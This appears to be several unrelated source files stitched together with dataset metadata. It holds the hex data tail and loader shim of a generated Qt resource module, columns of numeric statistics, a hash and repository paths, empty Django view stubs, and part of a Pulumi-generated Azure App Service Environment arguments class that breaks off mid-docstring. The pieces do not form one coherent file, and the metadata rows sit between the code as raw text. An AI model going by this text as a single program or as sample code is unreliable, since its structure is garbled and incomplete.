\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x18\x5a\x00\x00\x00\x00\x00\x01\x00\x01\x2e\x81\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x19\xe2\x00\x00\x00\x00\x00\x01\x00\x01\x41\xf6\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x0a\x94\x00\x00\x00\x00\x00\x01\x00\x00\x81\x9d\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x08\x04\x00\x00\x00\x00\x00\x01\x00\x00\x62\xd6\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x15\x24\x00\x00\x00\x00\x00\x01\x00\x01\x06\x6f\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x11\x64\x00\x00\x00\x00\x00\x01\x00\x00\xd3\xff\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x12\xc4\x00\x00\x00\x00\x00\x01\x00\x00\xe7\x4c\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x08\x40\x00\x00\x00\x00\x00\x01\x00\x00\x66\xbd\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x1f\x96\x00\x00\x00\x00\x00\x01\x00\x01\x8b\x75\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x14\x84\x00\x00\x00\x00\x00\x01\x00\x00\xfd\x95\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x20\xe8\x00\x00\x00\x00\x00\x01\x00\x01\x9b\xa9\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x17\xde\x00\x00\x00\x00\x00\x01\x00\x01\x29\x0b\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x01\x62\x00\x00\x00\x00\x00\x01\x00\x00\x10\x8a\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x20\xb0\x00\x00\x00\x00\x00\x01\x00\x01\x99\x0f\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x1c\xf6\x00\x00\x00\x00\x00\x01\x00\x01\x6b\xb0\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x21\x2e\x00\x00\x00\x00\x00\x01\x00\x01\x9e\x73\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x01\xa0\x00\x00\x00\x00\x00\x01\x00\x00\x13\x9e\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x1b\xec\x00\x00\x00\x00\x00\x01\x00\x01\x5c\xec\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x0e\x7c\x00\x00\x00\x00\x00\x01\x00\x00\xb2\x84\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x18\x42\x00\x00\x00\x00\x00\x01\x00\x01\x2d\x77\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x13\xa4\x00\x00\x00\x00\x00\x01\x00\x00\xf1\xef\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x0d\xf2\x00\x00\x00\x00\x00\x01\x00\x00\xab\xdc\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x0b\x02\x00\x00\x00\x00\x00\x01\x00\x00\x87\xbf\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x1c\x80\x00\x00\x00\x00\x00\x01\x00\x01\x66\x88\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x01\xc0\x00\x00\x00\x00\x00\x01\x00\x00\x14\xf9\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x0d\xb0\x00\x00\x00\x00\x00\x01\x00\x00\xa8\x08\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x0f\x6a\x00\x00\x00\x00\x00\x01\x00\x00\xbc\xd0\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x1e\xd6\x00\x00\x00\x00\x00\x01\x00\x01\x82\x05\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x1b\xa6\x00\x00\x00\x00\x00\x01\x00\x01\x57\x4e\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x1e\xb8\x00\x00\x00\x00\x00\x01\x00\x01\x80\x8f\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x11\xba\x00\x00\x00\x00\x00\x01\x00\x00\xd8\x14\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x17\xf4\x00\x00\x00\x00\x00\x01\x00\x01\x2a\x7c\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x02\x96\x00\x00\x00\x00\x00\x01\x00\x00\x1f\xbd\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x13\x34\x00\x00\x00\x00\x00\x01\x00\x00\xec\xb7\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x13\x4a\x00\x00\x00\x00\x00\x01\x00\x00\xed\xfc\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x1d\x9a\x00\x00\x00\x00\x00\x01\x00\x01\x72\x4f\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x11\x16\x00\x00\x00\x00\x00\x01\x00\x00\xd0\xc9\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x0b\xa8\x00\x00\x00\x00\x00\x01\x00\x00\x8e\x4c\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x1e\x42\x00\x00\x00\x00\x00\x01\x00\x01\x7b\x48\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x08\xfc\x00\x00\x00\x00\x00\x01\x00\x00\x70\x38\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x0d\x2c\x00\x00\x00\x00\x00\x01\x00\x00\xa0\x58\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x17\x48\x00\x00\x00\x00\x00\x01\x00\x01\x20\xfa\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x00\x78\x00\x00\x00\x00\x00\x01\x00\x00\x04\xe0\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x02\x32\x00\x00\x00\x00\x00\x01\x00\x00\x1a\xa4\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x1c\xb0\x00\x00\x00\x00\x00\x01\x00\x01\x67\xf4\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x10\x5a\x00\x00\x00\x00\x00\x01\x00\x00\xc8\x5b\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x18\x76\x00\x00\x00\x00\x00\x01\x00\x01\x30\xba\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x0c\x7e\x00\x00\x00\x00\x00\x01\x00\x00\x99\xa5\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x16\x8e\x00\x00\x00\x00\x00\x01\x00\x01\x16\x8a\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x00\xbe\x00\x00\x00\x00\x00\x01\x00\x00\x08\xce\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x13\x1a\x00\x00\x00\x00\x00\x01\x00\x00\xeb\x3d\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x21\xd8\x00\x00\x00\x00\x00\x01\x00\x01\xa7\x14\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x21\x62\x00\x00\x00\x00\x00\x01\x00\x01\xa1\x5c\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x0d\x64\x00\x00\x00\x00\x00\x01\x00\x00\xa3\x0b\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x18\x1c\x00\x00\x00\x00\x00\x01\x00\x01\x2c\x0f\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x03\x9a\x00\x00\x00\x00\x00\x01\x00\x00\x2b\xf9\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x0a\x4a\x00\x00\x00\x00\x00\x01\x00\x00\x7e\xc7\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x05\xe4\x00\x00\x00\x00\x00\x01\x00\x00\x49\xe1\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x14\xce\x00\x00\x00\x00\x00\x01\x00\x01\x00\x66\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x1b\xc4\x00\x00\x00\x00\x00\x01\x00\x01\x5b\x45\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x0e\xea\x00\x00\x00\x00\x00\x01\x00\x00\xb7\x8a\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x0e\x44\x00\x00\x00\x00\x00\x01\x00\x00\xaf\xde\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x08\x9e\x00\x00\x00\x00\x00\x01\x00\x00\x6b\xe1\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x20\x0e\x00\x00\x00\x00\x00\x01\x00\x01\x92\x1a\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x08\x5a\x00\x00\x00\x00\x00\x01\x00\x00\x69\x27\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x1f\x12\x00\x00\x00\x00\x00\x01\x00\x01\x84\xd6\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x0b\x8e\x00\x00\x00\x00\x00\x01\x00\x00\x8c\xf8\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x1d\x1c\x00\x00\x00\x00\x00\x01\x00\x01\x6d\x0d\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x21\xa2\x00\x00\x00\x00\x00\x01\x00\x01\xa4\x30\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x0a\x02\x00\x00\x00\x00\x00\x01\x00\x00\x7b\xe3\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x11\xa0\x00\x00\x00\x00\x00\x01\x00\x00\xd6\xad\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x02\x12\x00\x00\x00\x00\x00\x01\x00\x00\x19\x40\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x21\x7c\x00\x00\x00\x00\x00\x01\x00\x01\xa3\x1f\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x19\x8c\x00\x00\x00\x00\x00\x01\x00\x01\x3d\xee\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x19\x6a\x00\x00\x00\x00\x00\x01\x00\x01\x3c\x5e\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x0b\xbe\x00\x00\x00\x00\x00\x01\x00\x00\x8f\x8a\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x15\xe6\x00\x00\x00\x00\x00\x01\x00\x01\x0f\xb2\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x05\x9c\x00\x00\x00\x00\x00\x01\x00\x00\x47\x15\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x12\x5e\x00\x00\x00\x00\x00\x01\x00\x00\xe2\xcc\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x10\xd2\x00\x00\x00\x00\x00\x01\x00\x00\xce\x71\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x00\x10\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x0a\xe6\x00\x00\x00\x00\x00\x01\x00\x00\x86\x55\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x15\x92\x00\x00\x00\x00\x00\x01\x00\x01\x0b\x5d\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x11\xd6\x00\x00\x00\x00\x00\x01\x00\x00\xd9\xd8\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x16\x10\x00\x00\x00\x00\x00\x01\x00\x01\x10\xf0\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x0c\xe2\x00\x00\x00\x00\x00\x01\x00\x00\x9d\xb2\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x1c\xce\x00\x00\x00\x00\x00\x01\x00\x01\x69\x7f\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x14\xa4\x00\x00\x00\x00\x00\x01\x00\x00\xff\x31\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x0b\x20\x00\x00\x00\x00\x00\x01\x00\x00\x89\x2a\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x06\xfe\x00\x00\x00\x00\x00\x01\x00\x00\x58\x77\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x0b\x72\x00\x00\x00\x00\x00\x01\x00\x00\x8b\xb2\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x21\x48\x00\x00\x00\x00\x00\x01\x00\x01\x9f\xff\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x1e\x90\x00\x00\x00\x00\x00\x01\x00\x01\x7f\x07\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x05\x7e\x00\x00\x00\x00\x00\x01\x00\x00\x45\xc6\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x1d\x68\x00\x00\x00\x00\x00\x01\x00\x01\x6f\xb2\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x01\x3a\x00\x00\x00\x00\x00\x01\x00\x00\x0e\xf9\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x0f\x50\x00\x00\x00\x00\x00\x01\x00\x00\xbb\x79\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x02\x7c\x00\x00\x00\x00\x00\x01\x00\x00\x1d\xaa\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x11\xfa\x00\x00\x00\x00\x00\x01\x00\x00\xdb\x52\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x05\x22\x00\x00\x00\x00\x00\x01\x00\x00\x40\xb5\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x03\xd2\x00\x00\x00\x00\x00\x01\x00\x00\x31\x5b\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
"
# pyrcc-generated loader shim (do not hand-edit the data blobs above).
# Qt changed its binary resource-tree format in 5.8: older Qt expects the
# version-1 struct table, newer Qt the version-2 table (which carries an
# extra 8-byte last-modified timestamp per entry).
qt_version = [int(v) for v in QtCore.qVersion().split('.')]
if qt_version < [5, 8, 0]:
    rcc_version = 1
    qt_resource_struct = qt_resource_struct_v1
else:
    rcc_version = 2
    qt_resource_struct = qt_resource_struct_v2
def qInitResources():
    """Register the embedded resource tree with the Qt resource system."""
    QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
    """Unregister the embedded resource tree from the Qt resource system."""
    QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
# Resources are registered as a side effect of importing this module.
qInitResources()
| 55.845117
| 129
| 0.723237
| 128,826
| 534,717
| 3.001638
| 0.002375
| 0.076527
| 0.041801
| 0.043663
| 0.97971
| 0.969966
| 0.962042
| 0.952709
| 0.947689
| 0.940482
| 0
| 0.425908
| 0.018069
| 534,717
| 9,574
| 130
| 55.85095
| 0.310566
| 0.000284
| 0
| 0.664574
| 0
| 0.793785
| 0.000002
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0.000209
| false
| 0
| 0.000105
| 0
| 0.000314
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
4a664dc4c2eb8363d314ea2c8ca4600ff5d41601
| 203
|
py
|
Python
|
cornucopia/views/tags.py
|
AlexandraAlter/django-cornucopia
|
1681ccbc5e98736e61f6afb1b78931dda9547486
|
[
"MIT"
] | null | null | null |
cornucopia/views/tags.py
|
AlexandraAlter/django-cornucopia
|
1681ccbc5e98736e61f6afb1b78931dda9547486
|
[
"MIT"
] | null | null | null |
cornucopia/views/tags.py
|
AlexandraAlter/django-cornucopia
|
1681ccbc5e98736e61f6afb1b78931dda9547486
|
[
"MIT"
] | null | null | null |
from django import http, views
class TagListView(views.View):
    """Stub for the tag-list endpoint; no HTTP method handlers implemented yet."""
    pass
class TagView(views.View):
    """Stub for the single-tag endpoint; no HTTP method handlers implemented yet."""
    pass
class TagAliasView(views.View):
    """Stub for the tag-alias endpoint; no HTTP method handlers implemented yet."""
    pass
class TagImplicationView(views.View):
    """Stub for the tag-implication endpoint; no HTTP method handlers implemented yet."""
    pass
| 11.277778
| 37
| 0.714286
| 25
| 203
| 5.8
| 0.48
| 0.248276
| 0.358621
| 0.372414
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.20197
| 203
| 17
| 38
| 11.941176
| 0.895062
| 0
| 0
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.444444
| 0.111111
| 0
| 0.555556
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
4a85a092f03106ff913e0f5e95db9eae562313e9
| 17,062
|
py
|
Python
|
apps/fhir/server/tests/responses.py
|
dtisza1/bluebutton-web-server
|
6322f28d75bd9e00f8dc4b5988a0cd5f7c6c80cb
|
[
"Apache-2.0"
] | 25
|
2017-12-10T00:48:31.000Z
|
2022-03-25T01:29:13.000Z
|
apps/fhir/server/tests/responses.py
|
dtisza1/bluebutton-web-server
|
6322f28d75bd9e00f8dc4b5988a0cd5f7c6c80cb
|
[
"Apache-2.0"
] | 298
|
2017-12-05T05:53:32.000Z
|
2022-03-21T19:29:03.000Z
|
apps/fhir/server/tests/responses.py
|
dtisza1/bluebutton-web-server
|
6322f28d75bd9e00f8dc4b5988a0cd5f7c6c80cb
|
[
"Apache-2.0"
] | 31
|
2017-12-04T16:01:12.000Z
|
2021-09-26T22:34:55.000Z
|
# flake8: noqa
"""Canned FHIR backend responses for the server test suite.

The public ``responses`` mapping exposes one scenario per key:

* ``success``    -- a searchset Bundle with exactly one matching Patient.
* ``not_found``  -- an empty Bundle (``total`` 0, no ``entry`` key at all).
* ``error``      -- an HTTP 500 with no body.
* ``duplicates`` -- a Bundle whose ``total`` (2) matches its two entries.
* ``malformed``  -- a Bundle whose Patient carries ``_id`` instead of ``id``.
* ``lying``      -- a Bundle whose ``total`` (1) understates its two entries.

The values are identical to the original hand-expanded literals; the private
helpers below only factor out the Patient/Bundle/link structures that were
previously copy-pasted five times, so a fixture change now happens in one
place.  Each helper builds fresh dicts on every call, so no two scenarios
(and no two entries within a scenario) share mutable state.
"""

# Synthetic beneficiary id shared by every Patient fixture.
_PATIENT_ID = "-20000000002346"


def _links():
    """Build a fresh paging ``link`` list (first/last/self) for a Bundle."""
    page_url = ("https://sandbox.bluebutton.cms.gov/v1/fhir/Patient"
                "?_count=10&startIndex=0&_id=-20000000002346")
    return [
        {
            "relation": "first",
            "url": page_url,
        },
        {
            "relation": "last",
            "url": page_url,
        },
        {
            "relation": "self",
            "url": ("https://sandbox.bluebutton.cms.gov/v1/fhir/Patient/"
                    "?_count=10&_format=application%2Fjson%2Bfhir"
                    "&_id=-20000000002346&startIndex=0"),
        },
    ]


def _patient_entry(id_key="id"):
    """Build a fresh Bundle entry wrapping the canonical test Patient.

    ``id_key`` lets the ``malformed`` scenario store the resource id under
    the wrong key (``_id``) while keeping every other field identical.
    """
    return {
        "resource": {
            "resourceType": "Patient",
            id_key: _PATIENT_ID,
            "extension": [
                {
                    "url": "https://bluebutton.cms.gov/resources/variables/race",
                    "valueCoding": {
                        "system": "https://bluebutton.cms.gov/resources/variables/race",
                        "code": "1",
                        "display": "White",
                    },
                }
            ],
            "identifier": [
                {
                    "system": "https://bluebutton.cms.gov/resources/variables/bene_id",
                    "value": _PATIENT_ID,
                },
                {
                    "system": "https://bluebutton.cms.gov/resources/identifier/mbi-hash",
                    "value": "98765432137efea543f4f370f96f1dbf01c3e3129041dba3ea43675987654321",
                },
            ],
            "name": [
                {
                    "use": "usual",
                    "family": "Doe",
                    "given": [
                        "John",
                        "X",
                    ],
                }
            ],
            "gender": "male",
            "birthDate": "2000-06-01",
            "address": [
                {
                    "district": "999",
                    "state": "48",
                    "postalCode": "99999",
                }
            ],
        }
    }


def _bundle(total, entries=None):
    """Build a 200 response wrapping a searchset Bundle.

    ``total`` is stored verbatim (the ``lying`` scenario deliberately passes
    a value that disagrees with ``entries``).  When ``entries`` is None the
    ``entry`` key is omitted entirely, matching the original ``not_found``
    body rather than emitting an empty list.
    """
    content = {
        "resourceType": "Bundle",
        "id": "389a548b-9c85-4491-9795-9306a957030b",
        "meta": {
            "lastUpdated": "2019-12-18T13:40:02.792-05:00",
        },
        "type": "searchset",
        "total": total,
        "link": _links(),
    }
    if entries is not None:
        content["entry"] = entries
    return {
        "status_code": 200,
        "content": content,
    }


responses = {
    "success": _bundle(1, [_patient_entry()]),
    "not_found": _bundle(0),
    "error": {
        "status_code": 500,
    },
    "duplicates": _bundle(2, [_patient_entry(), _patient_entry()]),
    "malformed": _bundle(1, [_patient_entry(id_key="_id")]),
    # "lying": total claims one match but two entries are present.
    "lying": _bundle(1, [_patient_entry(), _patient_entry()]),
}
| 41.21256
| 156
| 0.302133
| 853
| 17,062
| 5.985932
| 0.114889
| 0.099295
| 0.122209
| 0.098707
| 0.984724
| 0.984724
| 0.984724
| 0.984724
| 0.984724
| 0.984724
| 0
| 0.154385
| 0.581643
| 17,062
| 413
| 157
| 41.312349
| 0.560941
| 0.000703
| 0
| 0.625304
| 0
| 0.036496
| 0.33171
| 0.041588
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
78dc9e542ad8932b9c4f5e353298af0c78dff6d5
| 42,438
|
py
|
Python
|
sdk/python/pulumi_azure/appservice/environment_v3.py
|
roderik/pulumi-azure
|
f6d0c058d6f9111a709bc5f1515d1638f9d615f0
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/appservice/environment_v3.py
|
roderik/pulumi-azure
|
f6d0c058d6f9111a709bc5f1515d1638f9d615f0
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/appservice/environment_v3.py
|
roderik/pulumi-azure
|
f6d0c058d6f9111a709bc5f1515d1638f9d615f0
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['EnvironmentV3Args', 'EnvironmentV3']
@pulumi.input_type
class EnvironmentV3Args:
    # Generated (tfgen) input-argument bag for the EnvironmentV3 resource.
    # Every field is stored/read through pulumi.set/pulumi.get so the Pulumi
    # runtime can track inputs; only non-None optionals are set in __init__.
    def __init__(__self__, *,
                 resource_group_name: pulumi.Input[str],
                 subnet_id: pulumi.Input[str],
                 allow_new_private_endpoint_connections: Optional[pulumi.Input[bool]] = None,
                 cluster_settings: Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentV3ClusterSettingArgs']]]] = None,
                 dedicated_host_count: Optional[pulumi.Input[int]] = None,
                 internal_load_balancing_mode: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 zone_redundant: Optional[pulumi.Input[bool]] = None):
        """
        The set of arguments for constructing a EnvironmentV3 resource.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the App Service Environment exists. Defaults to the Resource Group of the Subnet (specified by `subnet_id`).
        :param pulumi.Input[str] subnet_id: The ID of the Subnet which the App Service Environment should be connected to. Changing this forces a new resource to be created.
        :param pulumi.Input[bool] allow_new_private_endpoint_connections: Should new Private Endpoint Connections be allowed. Defaults to `true`.
        :param pulumi.Input[Sequence[pulumi.Input['EnvironmentV3ClusterSettingArgs']]] cluster_settings: Zero or more `cluster_setting` blocks as defined below.
        :param pulumi.Input[int] dedicated_host_count: This ASEv3 should use dedicated Hosts. Possible vales are `2`. Changing this forces a new resource to be created.
        :param pulumi.Input[str] internal_load_balancing_mode: Specifies which endpoints to serve internally in the Virtual Network for the App Service Environment. Possible values are `None` (for an External VIP Type), and `"Web, Publishing"` (for an Internal VIP Type). Defaults to `None`.
        :param pulumi.Input[str] name: The name of the App Service Environment. Changing this forces a new resource to be created.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "resource_group_name", resource_group_name)
        pulumi.set(__self__, "subnet_id", subnet_id)
        if allow_new_private_endpoint_connections is not None:
            pulumi.set(__self__, "allow_new_private_endpoint_connections", allow_new_private_endpoint_connections)
        if cluster_settings is not None:
            pulumi.set(__self__, "cluster_settings", cluster_settings)
        if dedicated_host_count is not None:
            pulumi.set(__self__, "dedicated_host_count", dedicated_host_count)
        if internal_load_balancing_mode is not None:
            pulumi.set(__self__, "internal_load_balancing_mode", internal_load_balancing_mode)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if zone_redundant is not None:
            pulumi.set(__self__, "zone_redundant", zone_redundant)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Input[str]:
        """
        The name of the Resource Group where the App Service Environment exists. Defaults to the Resource Group of the Subnet (specified by `subnet_id`).
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "resource_group_name", value)

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> pulumi.Input[str]:
        """
        The ID of the Subnet which the App Service Environment should be connected to. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "subnet_id")

    @subnet_id.setter
    def subnet_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "subnet_id", value)

    @property
    @pulumi.getter(name="allowNewPrivateEndpointConnections")
    def allow_new_private_endpoint_connections(self) -> Optional[pulumi.Input[bool]]:
        """
        Should new Private Endpoint Connections be allowed. Defaults to `true`.
        """
        return pulumi.get(self, "allow_new_private_endpoint_connections")

    @allow_new_private_endpoint_connections.setter
    def allow_new_private_endpoint_connections(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "allow_new_private_endpoint_connections", value)

    @property
    @pulumi.getter(name="clusterSettings")
    def cluster_settings(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentV3ClusterSettingArgs']]]]:
        """
        Zero or more `cluster_setting` blocks as defined below.
        """
        return pulumi.get(self, "cluster_settings")

    @cluster_settings.setter
    def cluster_settings(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentV3ClusterSettingArgs']]]]):
        pulumi.set(self, "cluster_settings", value)

    @property
    @pulumi.getter(name="dedicatedHostCount")
    def dedicated_host_count(self) -> Optional[pulumi.Input[int]]:
        """
        This ASEv3 should use dedicated Hosts. Possible vales are `2`. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "dedicated_host_count")

    @dedicated_host_count.setter
    def dedicated_host_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "dedicated_host_count", value)

    @property
    @pulumi.getter(name="internalLoadBalancingMode")
    def internal_load_balancing_mode(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies which endpoints to serve internally in the Virtual Network for the App Service Environment. Possible values are `None` (for an External VIP Type), and `"Web, Publishing"` (for an Internal VIP Type). Defaults to `None`.
        """
